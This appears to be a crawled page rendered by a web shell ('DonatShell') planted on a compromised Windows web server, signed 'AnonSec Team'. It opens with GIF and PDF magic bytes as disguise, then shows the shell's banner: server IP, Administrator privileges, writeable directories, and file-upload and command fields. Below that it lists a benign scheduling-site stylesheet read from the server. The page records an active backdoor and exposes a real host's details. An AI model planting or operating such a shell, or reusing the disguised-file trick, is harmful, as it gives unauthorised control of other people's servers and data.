GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/Scheduler/css/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/Scheduler/css/site.css
@charset "utf-8";
/* css/site.css */

/* css custom property values */
:root {
	--default-color: #000;
	--default-background: #eee;
	--credential-conflict: #f00;
	--credential-none: #fa0;
}

* { box-sizing: border-box; ;}
#dialogContainer { display:table; padding: 0; position:absolute !important; z-index:20; /** / border:2px solid #f00; /**/ }
#dialogDiv {
	/** /background-color:#fff;/**/
	/** /border:2px solid #ff0;/**/
	color:#000;
	/**/display:none;/**//** /display:block/**/;
	font-size:.8em;
    /** /padding:2px;/**/
    text-align:left;
	/** / border:2px solid #f00; white-space:pre; max-width:650px; transparent/**/
	z-index: 20;
}
#display_form { background-color: #ccc; color: black; }
#div_CalendarKey { background-color: #eee; font-size:.75em; margin-left:4px; padding-bottom:1em; width:145px; }
#div_RemoveClassVerify { display: none; }
#div_ScheduleFunctionsContainer {  }

#filtercontainer { display:none; }

#fldScheduleForm { border-color: #880000; margin: 2%; }

#navSidenav { display: block; }
#navSidenav {
  margin-right: -150px; /* 20px padding + 1px border */
  margin-left: -150px;
	position: absolute;
	top: 100px;
}
#navSidenav > li > a {
  padding-right: 20px;
  padding-left: 20px;
}

#schedulecontainer { position:relative; }

#textboxContainer { display:table; padding: 0; padding-right: 23px; position:absolute !important; z-index:500; /** / border:2px solid #f00; /**/ }
#textboxDiv { color:#000; display:none; font-size:.8em; padding:2px; text-align:left; }
.textboxButton { margin-right: 1em; }

/** /
#navSidenav > .active > a,
#navSidenav > .active > a:hover,
#navSidenav > .active > a:focus {
  color: #fff;
  background-color: #ccc;
}
/**/
nav#topnav{
/*	border:1px solid green;*/
	display:inline-block;
	padding:0;
	float:right;
}
nav#topnav > ul {
	margin:0;
	padding:0;
}
nav#topnav > ul > li {
	background-color:#000;
	display:inline-block;
	margin-top:5px;
	text-align:center;
	border-radius:10px;
}
nav#topnav > ul > li a {
	border-radius:10px;
	padding:10px 20px;
	color:#fff;
	display:inline-block;
	text-decoration:none;
}
nav#topnav > ul > li:hover,
nav#topnav > ul > li:hover > a,
nav#topnav > ul > li > a:hover,
nav#topnav > ul > li > a:focus {
  color: #000;
  background-color: #ccc;
	text-decoration:underline;
}
#scheduleBox { position: relative; display: table-cell; }

.action { color:#800; }
.actionback { background-color:#800; color:#fff; }

.block { display: block; }

.inside { z-index: 1;}

.relative { position: relative; }
.changeInSC { box-shadow: 0 0 5px 4px SpringGreen; outline: 2px solid SpringGreen; }

.calendar_class { background-color:#eee; border:3px solid #888; cursor:move; font-family: Arial, Verdana, sans-serif; overflow: hidden; position:relative; -webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; z-index: 10; }
.calendar_arranged { background-color:#eee; border: 3px solid #888; cursor:pointer; font-family: Arial, Verdana, sans-serif; overflow: hidden; position: relative; display: inline-block; /** /display: none;/**/ }
.calendar_hidden { display: none; }
.calendarTime { /**/padding: 0 .75em 0 .25em;/**/ } /* height, max-height, and min-height are set by Schedule/displaySchedule.phpinc */
.calendarCell { margin: 0; padding: 0; padding-right: 4px; } /* height, max-height, and min-height are set by Schedule/displaySchedule.phpinc */
.center { text-align:center; }
.class_same { color:blue; }

.drag_cursor { cursor: move; }

.error { font-weight:bold; color:#a00; }

.float_left { float:left; margin-right:.25em; }
.float_right { float:right; margin-left:.25em; }
.fullweek { width:13.68%; min-width:13.6%; }

.hidden { display:none; }

.info { color:darkgreen; }
.invisible { visibility: hidden; }

.large { font-size:1.25em; }
.left { text-align:left; }

.main { padding: 20px; }
.main .page-header { margin-top: 0; }

tr.siteneed-Active td 	{ background-color: #ff0 !important; color: #000 !important; }
tr.siteneed-Done td			{ background-color: #000 !important; color: #ccc !important; }
tr.siteneed-Error td		{ background-color: #800 !important; color: #fff !important; }
tr.siteneed-Feature td	{ background-color: #ccf !important; color: #000 !important; }
tr.siteneed-Idea td 		{ background-color: #ffc !important; color: #000 !important; }
tr.siteneed-Need td			{ background-color: #cfc !important; color: #000 !important; }
tr.siteneed-Unknown td	{}

.nowrap { white-space:nowrap; }

.online { background-color:#800; color:#fff; padding-left:.25em; padding-right:.25em; }
.offcampus { background-color:#008; color:#fff; padding-left:.25em; padding-right:.25em; }

.p { margin-top:1em; margin-bottom:1em; }
.placeholders {
  margin-bottom: 30px;
  text-align: center;
}
.placeholders h4 {
  margin-bottom: 0;
}
.placeholder {
  margin-bottom: 20px;
}
.placeholder img {
  display: inline-block;
  border-radius: 50%;
}
.prel { position: relative; }

.right { text-align: right; }

.small { font-size:.75em; }

.classTime { width:4.5em; } /* changed for width:4.25em; by Jim 2022-02-16 */

.ui-menu-item{
    background-color: white;
}

.ui-menu-item:hover{
    background-color: #949CB5;
}
/* Corner radius */
.ui-corner-all,
.ui-corner-top,
.ui-corner-left,
.ui-corner-tl {
    border-top-left-radius: 4px;
}
.ui-corner-all,
.ui-corner-top,
.ui-corner-right,
.ui-corner-tr {
    border-top-right-radius: 4px;
}
.ui-corner-all,
.ui-corner-bottom,
.ui-corner-left,
.ui-corner-bl {
    border-bottom-left-radius: 4px;
}
.ui-corner-all,
.ui-corner-bottom,
.ui-corner-right,
.ui-corner-br {
    border-bottom-right-radius: 4px;
}

.ui-helper-hidden {
    display: none;
}

.ui-helper-hidden-accessible {
    border: 0;
    clip: rect(0 0 0 0);
    height: 1px;
    margin: -1px;
    overflow: hidden;
    padding: 0;
    position: absolute;
    width: 1px;
}
.ui-autocomplete {
    position: absolute;
    top: 0;
    left: 0;
    cursor: default;
}
.ui-front {
    z-index: 100;
}

.ui-menu {
    list-style: none;
    padding: 0;
    margin: 0;
    display: block;
    outline: none;
}
.ui-menu .ui-menu {
    position: absolute;
}
.ui-menu .ui-menu-item {
    position: relative;
    margin: 0;
    padding: 3px 1em 3px .4em;
    cursor: pointer;
    min-height: 0;
}
.ui-menu .ui-menu-divider {
    margin: 5px 0;
    height: 0;
    font-size: 0;
    line-height: 0;
    border-width: 1px 0 0 0;
}
.ui-menu .ui-state-focus,
.ui-menu .ui-state-active {
    margin: -1px;
    background-color: grey;
}

.ui-widget {
    font-family: Verdana, Arial, sans-serif;
    font-size: 1.1em;
}
.ui-widget-content {
    border: 1px solid #aaaaaa;
    color: #222222;
}
.upMargin { margin-top: -2.4em; }

.warn { font-weight:bold; background-color:#fa0; }
.workweek { width:19%; min-width:19%; }


/* apply a natural box layout model to all elements, but allowing components to change */
html {
  box-sizing: border-box;
}
*, *:before, *:after {
  box-sizing: inherit;
}

body { 
	margin:0; 
	padding:0; 
	background-color: #bbb;
	/** /background-image: url("/images/bkg_base2.jpg");/**/
    /** /border: 1px solid green;/**/
    box-sizing: border-box;
}

div.mainnotes { max-height: 37em; margin: 0 1em 1em 0; overflow-y: auto; }
div.class { border:1px solid #000; }
div.hiddenx, div.hiddeny, div.hiddenz { display:none !important; }
div.scheduleTable { -webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; }
div.scheduleTable > div.scheduleRow > div.scheduleTime { border-left:1px solid black; }
div.scheduleTable > div.scheduleRow:nth-child(1) > div.scheduleTime { border-top:1px solid black; }
div.scheduleTable > div.scheduleRow:nth-child(1) > div.scheduleCell { border-top:1px solid black; }
div.scheduleRow { white-space: nowrap; }
div.scheduleCell { border-bottom:1px solid black; border-right:1px solid black; display: inline-block; }
div.scheduleHead { border-bottom:1px solid black; border-right:1px solid black; display: inline-block; font-weight: bold; text-align: center !important; }
div.scheduleTime, td.calendarTime { width: 66px; }
div.scheduleTime { border-bottom:1px solid black; border-left:1px solid black; border-right:1px solid black; display: inline-block; font-weight: bold; padding-right: .25em; text-align: right; }

fieldset {
    background: #e6e6e6;
    border: 5px solid #cc0000;
    border-radius: 10px;
	display:inline-block;
    font-family: sans-serif;
    /** /margin: 5px;/**/
    padding: 15px;
    vertical-align: top;
}
fieldset legend {
    background:#9a0000;
    border-radius: 8px;
    box-shadow: 0 0 0 5px #e6e6e6;
    color: #fff;
    font-size: 18px;
    margin-left: 20px;
    padding: 8px 10px ;
}
fieldset legend.close {
    margin-left: 0px;
}
fieldset#fldMeetings { border-color: #800; border-radius: 8px; /** /box-shadow: 0 0 0 5px #e6e6e6; padding: 8px,10px;/**/ padding:8px 14px 0 0; /** /display: table-cell;/**/ }
.ClassMeetings { }
footer#pageFooter { margin:25px 2em 2em 140px; padding:0 1em; /** /border:2px solid #D1CCA9; box-shadow:3px 3px 2px #D1CCA9;/**/ }

h1#pageTitle {
}
h2.mainnotes { background-color:#ccc; margin-right:.6em; }
header {
	overflow:hidden;
	background-color:#800;
	text-align:center;
	padding-top:0px;
	padding-left:0px;
	padding:10px;
}
header > h1 {
	display:inline-block;
	margin:0;
	text-shadow: 1px 1px 10px black;
	color: #eee;
}

header > div > a:focus,
header > div > a:hover {
	color:#000 !important;
}
input[type="checkbox"] {  }
input[type="checkbox"], input[type="radio"] { margin-right: 0px; vertical-align: bottom; }
input[type="checkbox"]+span, input[type="radio"]+span { display:inline-block; margin-left: 0; padding-left: .25em; padding-right: .25em; }
input[type="checkbox"]+span.weekday,input[type="checkbox"]+span+span.weekday {  width: 1.5em; }
input[type="checkbox"]:checked+span, input[type="checkbox"]:checked+span+span, input[type="radio"]:checked+span { background-color:#B51F3B; color:#fff; }
input[type=number] { font-family:"Courier New", Courier, mono; font-size:1em; text-align:right; }
input[type=number].num2 { width:2.5em; }

input[type=search] {
	background: #000 var(--url-images-search-icon) no-repeat 9px center;
    border: 2.5px solid #a00;
	/*border-radius: 10em;*/
	color: #bbb;
	font-family: inherit;
	font-size: 100%;
	padding: 9px 10px 9px 32px;
	width: 150px;
	transition: all .5s;
	z-index: 500;
}
input[type=search]:focus, input[type=search]:hover {
	width: 250px;

	background-color: #ccc;
	color: #000;
	position: relative;
	
	/* border-color:#c00; */
	
	/*box-shadow: 0 0 5px rgba(109,207,246,.5);*/
}
input[type=search]::placeholder {
	color: #ccc;
}
input[type=search]:focus::placeholder, input[type=search]:hover::placeholder {
	color: #333;
}

input[type=text].sectionNumbers { width: 7.5em; }
input[type="button"] {
	border: 1px solid #000;
	border-radius: 4px;
	background-color: #000;
	color: #ddd;
	padding: 2px;
	padding-left: 4px;
	padding-right: 4px;
}
input[type="button"].small {
	font-size: .8em;
}
input[type="button"]:hover, input[type="button"]:focus {
	border: 1px solid #800;
	background-color: #800;
}
input[type="button"]:active {
	border: 1px solid #000;
	background-color: #fff;
	color: black;
}
input[type="button"]:disabled {
	border: 1px solid #888;
	background-color: #888;
    cursor: not-allowed;
}

label { display: inline-block; padding-top: .5em; white-space:nowrap; }

main { margin-left: 150px; }

ol.tight, ul.tight { margin-top: 0px; margin-bottom: 0px; }

section.section { border:2px solid #D1CCA9; box-shadow:3px 3px 2px #D1CCA9; margin:2em 0; padding:0 1em 1em; }
select{
    border: 2px solid #cc0000;
    border-radius: 8px;
    background-color: #e6e6e6;
    color: black;
}
select:focus {
    border: 2px solid #cc0000;
    border-radius: 8px;
    background-color: white;
    color: black;
}
span.weekday { color:blue; display: inline-block; text-align: center; /** /width: 1em;/**/ }

table.center td { text-align:left; }
table.mainnotes { width:100%; }
table.mainnotes tr { background-color:#ccc; vertical-align:top; }
table.mainnotes tr td { background-color: transparent; padding:2px 4px; }
table.mainnotes tr td:first-child, table.mainnotes tr th:first-child { text-align:right; white-space:nowrap; }
table.mainnotes tr td:nth-child(2), table.mainnotes tr td:nth-child(4) { white-space:nowrap; }
table.mainnotes tr th:nth-child(2) { text-align:center; }
table.mainnotesDone tr td { color: #666; }
table.scheduleTable { border:1px solid #666; border-collapse:collapse; box-sizing: border-box; width:100%; -webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; }
table.scheduleTable td, table.scheduleTable th { border:1px solid #000; }
table.scheduleTable tr:nth-child(even) { background-color: #bbb;  }
table.section { width:100%; }

/*Where the general properties of the side nav are changed?*/
ul.nav {
    list-style-type:none;
    margin: 0;
    padding: 0;
    width: 150px;
    background-color: #000; /*Nav background color*/
}

/*Where the li properties are defined*/
ul.nav > li a, ul.nav > li label {
    display: block;
    color: #ccc; /*Controls the color of the text within the sidebar nav*/
    padding: 8px 16px; 
    text-decoration: none;
    border: 2.5px solid #a00; /*Nav li border properties*/
    border-collapse: collapse;
}

ul.nav .sub { background-color: #333 !important; display:none; margin-left: 10px; width: 127px; }
/* Change the properties of the inner li properties for Schedule drop down menu*/
ul.nav > li.sub a {
    padding: 4px 8px;
    border: 1px solid #a00;
}

/*Changes the inner Highlight li properties*/
ul.nav > li label{
    border: 1px solid #a00;
}

/* Changes the link color on hover and adds a transition to it changing */
ul.nav > li a:hover {
    background-color: #ccc;
    color: #000;
    transition: .75s;
}

x-note { background-color: #aaf; border: 1px dotted #ccf; font-size: .8em; }

@media (min-width: 768px) {
  .main {
    padding-right: 40px;
    padding-left: 40px;
  }
}


/* From student css files */

.class_Div { background-color:var(--default-background); border-color:var(--default-background); border-style:solid; border-width:3px; }
.class_Credential_Conflict { color:var(--credential-conflict) !important; }
.class_Credential_None { color:var(--credential-none); }
.class_Instructor_Conflict { background: linear-gradient(to bottom, var(--default-background) 25%, #f00 100%) !important; }
.class_Instructor_Multiple { background: linear-gradient(to bottom, var(--default-background) 25%, #ff0 100%); }
.class_Instructor_None { background: linear-gradient(to bottom, var(--default-background) 25%, #fa0 100%); }
.class_Room_Conflict { border-color:#f00 !important; }
.class_Room_Multiple { border-color:#ff0; }
.class_Room_None { border-color:#fa0; }

.class_blue { color: blue; }

#divHighlightCredential.crunch{
    padding:0;
    margin:0;
}

#divHighlightCredential.crunch p{
    margin:0;
		margin-top: 2px;
}

.Ferrari-Red{
    background-color:#FF2800;
}

.Electric-crimson{
    background-color:#FF003F;
}

.Tomato{
    background-color:#FF6347;
}

.Orioles-orange{
    background-color:#FB4F14;
}

.Orange{
    background-color:#FFA500;
}

.Fulvous{
    background-color:#E48400;
}

.Citrine{
    background-color:#E4D00A;
}

.Maize{
    background-color:#FBEC5D;
}

.Yellow{
    background-color:#FFFF00;
}

.Chartreuse{
    background-color:#7FFF00;
}

.Lime{
    background-color:#00FF00;
}

.Kelly-green{
    background-color:#4CBB17;
}

.Celeste{
    background-color:#B2FFFF;
}

.Electric-blue{
    background-color:#7DF9FF;
}

.Cyan{
    background-color:#00FFFF;
}

.Heliotrope{
    background-color:#DF73FF;
}

.Bright-ube{
    background-color:#D19FE8;
}

.Brilliant-lavender{
    background-color:#F4BBFF;
}

.Purple-pizzazz{
    background-color:#FE4EDA;
}

.Magenta{
    background-color:#FF00FF;
}

.Deep-pink{
    background-color:#FF1493;
}


Anon7 - 2022
AnonSec Team